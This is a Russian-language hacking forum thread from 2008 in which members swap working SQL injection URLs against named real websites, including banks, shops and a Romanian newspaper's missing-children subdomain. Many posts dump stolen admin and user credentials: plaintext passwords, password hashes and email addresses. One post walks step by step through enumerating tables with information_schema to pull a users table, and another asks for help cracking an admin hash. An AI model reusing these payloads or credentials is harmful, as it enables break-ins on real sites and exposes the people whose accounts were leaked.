Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.07.2008, 18:24
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Ну что же друзья...а вот и я
http://www.gathsports.com/productsingle.php?id=1%27+UNION+SELECT+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Database Version: 5.0.22
Database name: web56_db1
User name: web56_u1@localhost
в БД единственная интересная на мой взгляд таблица login с колонками username и password
там всего 2 записи
ric:letmein
sue:letmein
админку не искал...
всем спасибо
Ну а теперь предлагаю вашему вниманию сайт с ПР6, www.jurnalul.ro очень известный и популярный в Румынии журнал, на самом сайте я ничего интересного не нашел...но через суб домен... http://copiidisparuti.jurnalul.ro я обнаружил скулю и соответственно и база у них одна.Админ и редакция были мной уведомлены еще месяц назад, так как они ничего не придпренимают..выложил так сказать в паблик
http://copiidisparuti.jurnalul.ro/detalii.php?s=1&id=149+union+select+1,concat_ws(0x 3a,user(),version(),database()),3,4,5,6,7,8,9+limi t+1,1/*
Database Version: 5.0.24a
Database name: copiidisp
User name: jurnalul@localhost
В БД 2 базы но нам интересна база jurnalul_site где находится информация нужная нам..то есть админы
admins
admin_username, admin_password
admin:qZpD7%uJqdJ.
flori:nokia
claudiugamulescu:claudiu
diana:karakum
aleks:huinea
последний в записях админа скорее всего молдованин или руский который работает в редакции, так как пароль скажем так с русской спецификой.
Всем спасибо.
Пойдем дальше...
http://www.radiogaga.ro/listgalerii.php?idgalerie=1+union+select+1,2,aes_d ecrypt(aes_encrypt(concat_ws(version(),database(), user()),0x71),0x71),4,5,6,7,8,9/*
Database Version: 4.1.13a RDS Hosting Databases
Database name: radiogaga
User name: radiogaga@localhost
кроме phpbb_users не нашел ничего
user_password, username
6be414417e0001f12039083621f436cc:avitus----> Alamo97
41955c3830838c240729b92550c12dd9:Francisc Pataki
f07fa1d519bf547c76ba56b732c2cd27:Kraus Kinga
09909326d2ba3e970de66c159b05bdf6:Misi
81ef1753db31e4c85dbc18b9c751d336:OLi!
905492bc9379a5efde0923283fc82d00:gerbera51
bc9850b32b863fd80cdf7ef63c183759:gravamen_1686
b1932d548fa7208117e4d332c378c532:castigo1307
http://www.tailormadetours.com.au/emailtofriend.php?ID=-1+UNION+SELECT+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48/*
Database Version: 5.0.46
Database name: ttours
User name: ttour@203.130.164.130
вывод в поле Your Message
В БД 3 базы :
test
test_cms_database
ttours
только в первой есть таблица users ..но в ней только
userid
username
emailaddress
3:shayne:shayne@adimpact.com.au
4:mike:mike@adimpact.com.au
у кого есть желание поковырятся..милости просим.Спасибо всем.
Последний раз редактировалось Gorev; 06.07.2008 в 19:35..
|
|
|
06.07.2008, 21:38
|
|
Новичок
Регистрация: 21.08.2005
Сообщений: 3
Провел на форуме:
24571
Репутация:
0
|
|
http://www.bankrollmob.com/forum.asp?mode=thread&id=-32278%20union%20select%20pwd,2%20from%20admin
Password: 75ea14129638ac5c2bd34c0a615dfe7f
Please crack for me password. Help me
|
|
|
|
06.07.2008, 22:21
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
PR 4
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(version(),0x3a3a,user(), 0x3a3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6/*
version(): 5.0.45-community
user(): blackgos_test@localhost
database(): blackgos_bgppromos
http://www.blackgospelpromo.com/admin/contest.php
тут есть кое что интересное=)
Последний раз редактировалось gisTy; 06.07.2008 в 23:01..
|
|
|
|
06.07.2008, 22:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от gisTy
доступ к information_schema закрыт..
Я открыл его 
_http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16+from+information_schema.tables+limit+ 17,1/*
Таблица admin_user в титле
Сам ковыряй, если надо
_http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(user_name,0x3a,user_pass ),4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin_user/*
j1prophet:BEAtrice
Последний раз редактировалось jokester; 06.07.2008 в 22:34..
|
|
|
|
06.07.2008, 22:57
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
аа.. ступил... просто поставил в строку information_schma.tables... спасибо=)
|
|
|
|
06.07.2008, 23:14
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Allnight.ru - PR 3
http://www.allnight.ru/news/?category=1'+union+select+1,2,version(),4,5,6,7,8, 9,10,11,12/*
|
|
|
|
07.07.2008, 07:57
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
www.photo.buyyourstockphotos.com
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27--
version(): 5.0.51a-3ubuntu5.1
user(): buystock@localhost
database(): buystock
file_priv к сожалению нет..
так как версия пятая, то есть база information_schema.. из нее берем названия таблиц:
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from +information_schema.tables+limit+1,1--
есть табличка users.. смотрим какие в ней колонки
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fro m+information_schema.columns+where+table_name=0x75 73657273+limit+1,1--
и делаем вывод из таблицы
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,concat_ws(0x3a3a,user,pass),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27+from+buystock.users--
все очень просто=)
|
|
|
|
07.07.2008, 14:10
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040
Репутация:
177
|
|
== Анализ Сайта kreit.ru ==
Яндекс: тИЦ - 110, Страниц - 313
Google: PR - 2
ЯК: Есть;
=====================================
http://kreit.ru/templates/allnews.php?pid=999999999+union+select+1,concat_ws (0x3a3a,user(),version(),database()),3/*
kreit@jet.mplik.ru::5.0.41-log::kreit
17:extradata
18:ipublisher_email
19:ipublisher_faq
20:ipublisher_faq_lines
21:ipublisher_files
22:ipublisher_materials
23:ipublisher_materials_types
24:ipublisher_modules
25:ipublisher_news
26:ipublisher_news_lines
27:ipublisher_publishes
28:ipublisher_publishes_links
29:ipublisher_tekon17
30:ipublisher_tekon19
31:ipublisher_templates
32:ipublisher_textdocuments
33:ipublisher_vars
34:itaf_forum
35:itaf_group
36:itaf_message
37:itaf_mod
38:itaf_subscribe
39:itaf_thread
40:itaf_user
41:itaf_whois
42  rder_all
http://kreit.ru/templates/allnews.php?pid=999999999+union+select+1,concat_ws (0x3a,user_name,user_pass,user_mail,user_icq),3+fr om+itaf_user+limit+0,1/*
merlin_sw:2e782c85379a326e:merlin_sw@mail.ru:
135 записей, типа хэша Mysql5
|
|
|
|
07.07.2008, 14:31
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Код:
http://www.dpmhi.com/news.php?id=-1+union+select+all+1,2,concat_ws(0x3a,version(),user(),database()),4,5--
Код:
http://www.worldwidehealthcenter.net/category.php?prod=-1+union+select+all+1,2,3,4,5,6,7,8,9,10,11,darkc0de,13,14,15,16,17,18
Код:
http://www.jleen.com/page.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3--
Код:
http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9--
Код:
http://firstfreedombank.com/PRstory.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
Код:
http://www.atbskimmers.com/product.php?id=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26--
Код:
http://www.pokerdvd.net/product.php?id=-1+union+select+all+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15--
Код:
http://www.asynt.com/product_ranges_view.php?ID=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9--
Код:
http://www.mofsupply.com/productDetail.php?id=-1+union+select+all+1,2,3,darkc0de,5,6,7,8,9,10,11,12,13,14,15,16,17
Код:
http://www.texasalliance.org/houstonwildcatters.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--
Код:
http://www.icd-usa.com/news1.php?id=-8+UNION+ALL+SELECT+1,2,@@version,4,5,6,7,8,9,10,11--
http://www.cnet.org.uk/news1.php?ID=-60+UNION+ALL+SELECT+1,@@version,3,4--
http://www.corporatedevelopmint.com/news1.php?ID=-152+UNION+ALL+SELECT+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14--
http://effluxtechnologies.com/news1.php?ID=-8+UNION+ALL+SELECT+1,@@version,3,4,5--
http://www.michaelpollan.com/article.php?id=-87+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10--
http://www.virtuosimedia.com/resource.php?id=0&cat=-1+UNION+ALL+SELECT+1,@@version,3,4--
http://www.guerrillanews.com/articles/article.php?id=-717+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18,19,20,21,22,23--
http://www.etleboro.com/read.php?id=-396+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9--
http://www.syroil.com/news1.php?id=-8+UNION+ALL+SELECT+1,2,@@version--
http://www.lavocedellevoci.it/news1.php?id=-80+UNION+ALL+SELECT+1,2,3,4,@@version,6--
http://www.lavocedellevoci.it/grandifirme1.php?id=-20+UNION+ALL+SELECT+1,2,@@version,4,5--
http://www.allfungames.com/games.php?id=-8+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13--
http://www.warnickart.com/posters/art.php?id=-78+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13--
http://www.neltnercreative.com/advertising/art.php?id=-57+UNION+ALL+SELECT+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
http://www.purdes.com/blog/art.php?id=-164+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8--
Последний раз редактировалось Constantine; 07.07.2008 в 19:53..
|
|
|
|
07.07.2008, 19:51
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Антибоян обновлен, не забываем проверять свои инжекты.
Так же обращаю внимание на то что я перенес лист на другой хостинг;
http://constant1ne.by.ru/sqls.html - корневой пост отредактирован
Отдельное спасибо юзерам z01b и gisTy за помощь
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
